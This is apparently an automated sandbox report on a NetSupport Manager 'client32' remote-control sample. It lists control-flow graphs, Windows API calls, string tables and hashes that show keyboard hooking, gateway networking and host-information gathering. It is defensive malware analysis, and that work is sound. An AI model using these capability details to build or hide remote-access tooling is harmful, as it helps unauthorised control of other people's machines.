                                                                                                                                                                                                    control_flow_graph 1361 689c3d00-689c3d42 call 689d1c50 call 689c3b80 1365 689c3d47-689c3d4f 1361->1365 1366 689c3d6c-689c3d6e 1365->1366 1367 689c3d51-689c3d6b call 689d28e1 1365->1367 1369 689c3d87-689c3da1 call 689b8fb0 1366->1369 1370 689c3d70-689c3d84 call 689b6f50 1366->1370 1376 689c3dc5-689c3e44 call 689b5e90 * 2 call 689c7be0 call 689b5e20 lstrlenA 1369->1376 1377 689c3da3-689c3dc4 call 689b63c0 call 689d28e1 1369->1377 1370->1369 1390 689c3e98-689c3fbe call 689b5500 call 689b6050 call 689c7c70 * 2 call 689c7d00 * 3 call 689b5060 call 689c7d00 call 689d1bfd call 689c7d00 gethostname call 689c7d00 call 689bb8e0 1376->1390 1391 689c3e46-689c3e95 call 689cd8b0 call 689b5060 call 689b4830 call 689d1bfd 1376->1391 1426 689c3fc5-689c3fe1 call 689c7d00 1390->1426 1427 689c3fc0 1390->1427 1391->1390 1430 689c3ff8-689c3ffe 1426->1430 1431 689c3fe3-689c3ff5 call 689c7d00 1426->1431 1427->1426 1433 689c421a-689c4263 call 689c7b60 call 689d1bfd call 689b98d0 call 689c77e0 1430->1433 1434 689c4004-689c4022 call 689b5e20 1430->1434 1431->1430 1461 689c4265-689c4291 call 689ba4e0 call 689d28e1 1433->1461 1462 689c4292-689c42aa call 689d28e1 1433->1462 1440 689c405a-689c4084 call 689b5e20 1434->1440 1441 689c4024-689c4057 call 689b5060 call 689c7d00 call 689d1bfd 1434->1441 1449 689c408a-689c41ce call 689b5060 call 689c7d00 call 689d1bfd call 689b5e20 call 689b5060 call 689c7d00 call 689d1bfd call 689b5e20 call 689b5060 call 689c7d00 call 689d1bfd call 689b5e20 call 689b5060 call 689c7d00 call 689d1bfd 1440->1449 1450 689c41d1-689c4217 call 689c7d00 call 689b5e20 call 689c7d00 1440->1450 1441->1440 1449->1450 1450->1433
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: *Dept$*Gsk$1.1$141700$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
                                                                                                                                                                                                    • API String ID: 0-1022012017
                                                                                                                                                                                                    • Opcode ID: 1bc4d73592b90fbf59213ebdf95592c9cd0666e543ec125b3d86f69403d0395c
                                                                                                                                                                                                    • Instruction ID: 3211e3f5981a2a6b0149b402e955c333ef415a33701a6899f5eec2db37e5e906
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1bc4d73592b90fbf59213ebdf95592c9cd0666e543ec125b3d86f69403d0395c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7DE1A2B6C405187ACB25DBA4DC80FFFB7789F69209F8040D9E50962141EB75EB85CFA2

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1502 1113dad0-1113db15 call 11142a60 1505 1113dba7-1113dbd3 call 1113f4f0 call 111434f0 LoadLibraryA 1502->1505 1506 1113db1b-1113db3d call 1105d340 1502->1506 1518 1113dc07 1505->1518 1519 1113dbd5-1113dbdc 1505->1519 1511 1113db8b-1113db92 1506->1511 1512 1113db3f-1113db5c call 11015e10 1506->1512 1511->1505 1516 1113db94-1113dba0 call 11017670 1511->1516 1521 1113db5e-1113db6b GetProcAddress 1512->1521 1522 1113db6d-1113db6f 1512->1522 1516->1505 1530 1113dba2 call 110cb920 1516->1530 1524 1113dc11-1113dc31 GetClassInfoExA 1518->1524 1519->1518 1523 1113dbde-1113dbe5 1519->1523 1521->1522 1526 1113db71-1113db73 SetLastError 1521->1526 1533 1113db79-1113db82 1522->1533 1523->1518 1527 1113dbe7-1113dc05 call 1105d340 1523->1527 1528 1113dc37-1113dc5f call 1115e4f0 call 11140b20 1524->1528 1529 1113dcd9-1113dd34 1524->1529 1526->1533 1527->1524 1543 1113dc61-1113dc75 call 110290f0 1528->1543 1544 1113dc78-1113dcc0 call 11140b20 call 11140b50 GetStockObject RegisterClassExA 1528->1544 1545 1113dd36-1113dd3d 1529->1545 1546 1113dd6e-1113dd75 1529->1546 1530->1505 1533->1511 1537 1113db84-1113db85 FreeLibrary 1533->1537 1537->1511 1543->1544 1544->1529 1575 1113dcc2-1113dcd6 call 110290f0 1544->1575 1545->1546 1548 1113dd3f-1113dd46 1545->1548 1550 1113ddb1-1113ddd5 call 1105d340 1546->1550 1551 1113dd77-1113dd86 call 1110c420 1546->1551 1548->1546 1554 1113dd48-1113dd5f call 11129900 LoadLibraryA 1548->1554 1561 1113dde3-1113dde8 1550->1561 1562 1113ddd7-1113dde1 1550->1562 1565 1113ddaa 1551->1565 1566 1113dd88-1113dda8 1551->1566 1554->1546 1570 1113dd61-1113dd69 GetProcAddress 1554->1570 1568 1113ddf4-1113ddfb 1561->1568 1569 1113ddea 1561->1569 1562->1568 1567 1113ddac 1565->1567 1566->1567 1567->1550 1571 1113de08-1113de25 call 11139490 1568->1571 
1572 1113ddfd-1113de03 call 110f58a0 1568->1572 1569->1568 1570->1546 1581 1113de2b-1113de32 1571->1581 1582 1113deda-1113deea 1571->1582 1572->1571 1575->1529 1583 1113de34-1113de46 call 1110c420 1581->1583 1584 1113de6f-1113de76 1581->1584 1593 1113de61 1583->1593 1594 1113de48-1113de5f call 11159ed0 1583->1594 1586 1113de78-1113de7f 1584->1586 1587 1113de9f-1113deb0 1584->1587 1589 1113de81 call 11131d10 1586->1589 1590 1113de86-1113de9a SetTimer 1586->1590 1591 1113deb2-1113deb9 1587->1591 1592 1113dec9-1113ded4 #17 LoadLibraryA 1587->1592 1589->1590 1590->1587 1591->1592 1596 1113debb-1113dec2 1591->1596 1592->1582 1599 1113de63-1113de6a 1593->1599 1594->1599 1596->1592 1597 1113dec4 call 1112a760 1596->1597 1597->1592 1599->1584
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 1113DB64
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 1113DB73
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 1113DB85
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(imm32,?,?,00000002,00000000), ref: 1113DBC4
                                                                                                                                                                                                    • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 1113DC29
                                                                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 1113DC8F
                                                                                                                                                                                                    • GetStockObject.GDI32(00000000), ref: 1113DC9A
                                                                                                                                                                                                    • RegisterClassExA.USER32(?), ref: 1113DCB5
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(pcihooks,?,?,00000002,00000000), ref: 1113DD52
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 1113DD67
                                                                                                                                                                                                    • SetTimer.USER32(00000000,00000000,000003E8,11139470), ref: 1113DE94
                                                                                                                                                                                                    • #17.COMCTL32(?,?,?,00000002,00000000), ref: 1113DEC9
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000002,00000000), ref: 1113DED4
                                                                                                                                                                                                      • Part of subcall function 11015E10: LoadLibraryA.KERNEL32(User32.dll), ref: 11015E18
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad$AddressClassProc$CursorErrorFreeInfoLastObjectRegisterStockTimer
                                                                                                                                                                                                    • String ID: *DisableDPIAware$*quiet$Client$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$SetProcessDPIAware$TraceCopyData$UI.CPP$View$_License$_debug$imm32$pcihooks$riched32.dll$Zv
                                                                                                                                                                                                    • API String ID: 1204707258-572506831
                                                                                                                                                                                                    • Opcode ID: 665e3ab546c8d01ad812599e4808584227d69fbc25d52b505f28837da7894551
                                                                                                                                                                                                    • Instruction ID: eeaa44aaf805afce620a012973528e55005956dd55c3add89e5b481fbdd40cac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 665e3ab546c8d01ad812599e4808584227d69fbc25d52b505f28837da7894551
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FCB1F674A1122A9FDB02DFE1CD88BADFBB5AB8472EF904138E525972C8F7745040CB56

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,?,?,?,?,00000100), ref: 1102D9E1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                    • String ID: $141700$30/10/15 13:45:13 V12.10F4$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                                                                                                    • API String ID: 1029625771-3390026015
                                                                                                                                                                                                    • Opcode ID: 4c6442ae546d6c34c6e669bc9b0d3f2b7a72132ce3f96623498d00e912fca378
                                                                                                                                                                                                    • Instruction ID: 3410179eeb5a9037d1fa1f4c8bb60b9922e488a50ebb30bdceadca7c29897b10
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c6442ae546d6c34c6e669bc9b0d3f2b7a72132ce3f96623498d00e912fca378
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03C1C375E0026A9FDB22DF948C90BEDF7B9BB44308F9044EDE559A7240E7706E80CB61

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(689FB898,00000000,?,00000000,?,689BD77B,00000000), ref: 689B63E8
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(-0003F3B7), ref: 689B63FA
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,689BD77B,00000000), ref: 689B6412
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 689B643B
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,00000000,?,689BD77B,00000000), ref: 689B6450
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 689B646F
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,00000000,?,689BD77B,00000000), ref: 689B6484
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 689B64A3
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,00000000,?,689BD77B,00000000), ref: 689B64C5
                                                                                                                                                                                                    • shutdown.WSOCK32(?,00000001,?,00000000,?,689BD77B,00000000), ref: 689B64E9
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000001,?,00000000,?,689BD77B,00000000), ref: 689B64F2
                                                                                                                                                                                                    • timeGetTime.WINMM(?,00000001,?,00000000,?,689BD77B,00000000), ref: 689B6510
                                                                                                                                                                                                    • #16.WSOCK32(?,?,00001000,00000000,?,00000000,?,689BD77B,00000000), ref: 689B6526
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,689BD77B,00000000), ref: 689B6533
                                                                                                                                                                                                    • timeGetTime.WINMM(?,00000000,?,689BD77B,00000000), ref: 689B6540
                                                                                                                                                                                                    • Sleep.KERNEL32(00000001,?,00000000,?,689BD77B,00000000), ref: 689B654B
                                                                                                                                                                                                    • #16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,689BD77B,00000000), ref: 689B6563
                                                                                                                                                                                                    • closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,689BD77B,00000000), ref: 689B6574
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,689BD77B,00000000), ref: 689B657D
                                                                                                                                                                                                    • Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,689BD77B,00000000), ref: 689B658E
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,689BD77B,00000000), ref: 689B659E
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,689BD77B,00000000), ref: 689B65D7
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(689FB898,?,00000000,?,689BD77B,00000000), ref: 689B65F2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlockedclosesocketshutdown
                                                                                                                                                                                                    • String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
                                                                                                                                                                                                    • API String ID: 2828415955-2631155478
                                                                                                                                                                                                    • Opcode ID: 83cdbfff6854887220eaa0c64475827b516ba9fc56cea489f2e0b96774fb4432
                                                                                                                                                                                                    • Instruction ID: f12804eefb3bbaf1705cc0173d8da3f4a077469257e2c99c6ca9f62415c715d0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83cdbfff6854887220eaa0c64475827b516ba9fc56cea489f2e0b96774fb4432
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6251B176648700AFD715DF68DD88B5A73BDBF89328F904124E61AD7280DBB0F894CB64

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
                                                                                                                                                                                                    • API String ID: 0-2848211065
                                                                                                                                                                                                    • Opcode ID: a6970ee6fe2fd02da8d2ea76a441d932458592c3a116e46df54a29290583b3a2
                                                                                                                                                                                                    • Instruction ID: aa02f064b3eb4e4bfab072fef5dec22bd890135ecc410541feee5449b0b06243
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a6970ee6fe2fd02da8d2ea76a441d932458592c3a116e46df54a29290583b3a2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07D1F475A142189FDB24CF64DC84BEEB7B8AF6A308F8440D9E81D9B241E731D985CF91

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6FCC1370,?,0000001A), ref: 1102837D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileModuleName
                                                                                                                                                                                                    • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                                                                                                                                    • API String ID: 514040917-357498123
                                                                                                                                                                                                    • Opcode ID: bffd7a72419acbf4e69006bd0d2009b0d15558627307e104a623c4426f2c4fa7
                                                                                                                                                                                                    • Instruction ID: 3ecfaec1c78aa64732578d28134276498dc59d4967fe96fbd16849b56c65f872
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bffd7a72419acbf4e69006bd0d2009b0d15558627307e104a623c4426f2c4fa7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E12E33ED052A78BDB55CF24CC807D8B7F4AB1A308F4440EAE99597205EB719786CB92

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,00000001,?), ref: 110858CC
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110858EA
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 1108592C
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11085947
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108595C
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108596D
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108597E
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108598F
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 110859A0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                                                                                                                                    • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                                                                                                                                    • API String ID: 2201880244-3035937465

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 689C6BD5
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 689C6C26
                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 689C6C5B
                                                                                                                                                                                                      • Part of subcall function 689C6940: GetTickCount.KERNEL32 ref: 689C6950
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000002F4,?), ref: 689C6C7C
                                                                                                                                                                                                    • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 689C6CB4
                                                                                                                                                                                                    • Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 689C6CD9
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 689C6CEC
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 689C6DF3
                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(02ED2D42,00000000), ref: 689C6E01
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(02ED2CEA), ref: 689C6EC3
                                                                                                                                                                                                    • SetEvent.KERNEL32(000002F8), ref: 689C6ECF
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 689C6F4F
                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(02ED2C8A,-689FA188), ref: 689C6F60
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • ReadMessage returned FALSE. Terminating connection, xrefs: 689C6F3A
                                                                                                                                                                                                    • ProcessMessage returned FALSE. Terminating connection, xrefs: 689C6F25
                                                                                                                                                                                                    • FALSE, xrefs: 689C6E67
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 689C6E62
                                                                                                                                                                                                    • httprecv, xrefs: 689C6BDD
                                                                                                                                                                                                    • ResumeTimeout, xrefs: 689C6BBA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountTick$Interlocked$ExchangeSleep$DecrementEventObjectSingleWaitselect
                                                                                                                                                                                                    • String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
                                                                                                                                                                                                    • API String ID: 4030855142-919941520

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                    • OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11105E1A
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 11105E29
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11105E3B
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 11105E71
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GrabKM), ref: 11105E9E
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,LoggedOn), ref: 11105EB6
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 11105EDB
                                                                                                                                                                                                      • Part of subcall function 1110C2B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,771CC310,00000000,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF), ref: 1110C2C7
                                                                                                                                                                                                      • Part of subcall function 1110C2B0: CreateThread.KERNEL32(00000000,1110D1D5,00000001,00000000,00000000,0000000C), ref: 1110C2EA
                                                                                                                                                                                                      • Part of subcall function 1110C2B0: WaitForSingleObject.KERNEL32(?,000000FF,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF,?,11026F57), ref: 1110C317
                                                                                                                                                                                                      • Part of subcall function 1110C2B0: CloseHandle.KERNEL32(?,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF,?,11026F57), ref: 1110C321
                                                                                                                                                                                                    • GetStockObject.GDI32(0000000D), ref: 11105EEF
                                                                                                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 11105EFF
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0000003C), ref: 11105F1B
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(111EC5C4), ref: 11105F26
                                                                                                                                                                                                      • Part of subcall function 111042A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11186026,000000FF), ref: 11104373
                                                                                                                                                                                                      • Part of subcall function 111042A0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111043C2
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 11105F69
                                                                                                                                                                                                      • Part of subcall function 1109DCF0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD11
                                                                                                                                                                                                      • Part of subcall function 1109DCF0: OpenProcessToken.ADVAPI32(00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD18
                                                                                                                                                                                                      • Part of subcall function 1109DCF0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000002,00000000), ref: 1109DD37
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 11105FBA
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 1110600F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWaitwsprintf
                                                                                                                                                                                                    • String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
                                                                                                                                                                                                    • API String ID: 1112464733-403456261
                                                                                                                                                                                                    • Opcode ID: 5635cacc2ea566ca3e71dd3805252e4bc2cfcb6a1aaacb447e2f795ad6309a42
                                                                                                                                                                                                    • Instruction ID: 98d48469d2e7b61091a73167657919c28ab3cbb48a1ba220805b109c32019478
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5635cacc2ea566ca3e71dd3805252e4bc2cfcb6a1aaacb447e2f795ad6309a42
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6981B1B1E007569FDB51CFB48C89BAAFBE5BB08308F10857DE569D7280D7706A40CB12
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141710: GetVersionExA.KERNEL32(111ECE98,76596610), ref: 11141740
                                                                                                                                                                                                      • Part of subcall function 11141710: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
                                                                                                                                                                                                    • PostMessageA.USER32(0001048A,000006CF,00000007,00000000), ref: 1113623F
                                                                                                                                                                                                    • SetWindowTextA.USER32(0001048A,00000000), ref: 111362E7
                                                                                                                                                                                                    • IsWindowVisible.USER32(0001048A), ref: 111363AC
                                                                                                                                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?), ref: 111363CC
                                                                                                                                                                                                    • IsWindowVisible.USER32(0001048A), ref: 111363DA
                                                                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 11136408
                                                                                                                                                                                                    • EnableWindow.USER32(0001048A,00000001), ref: 11136417
                                                                                                                                                                                                    • IsWindowVisible.USER32(0001048A), ref: 11136468
                                                                                                                                                                                                    • IsWindowVisible.USER32(0001048A), ref: 11136475
                                                                                                                                                                                                    • EnableWindow.USER32(0001048A,00000000), ref: 11136489
                                                                                                                                                                                                    • EnableWindow.USER32(0001048A,00000000), ref: 111363EF
                                                                                                                                                                                                      • Part of subcall function 1112E330: ShowWindow.USER32(0001048A,00000000,?,11136492,00000007,?,?,?,?,?,00000000,?,?,?,?,?), ref: 1112E354
                                                                                                                                                                                                    • EnableWindow.USER32(0001048A,00000001), ref: 1113649D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion
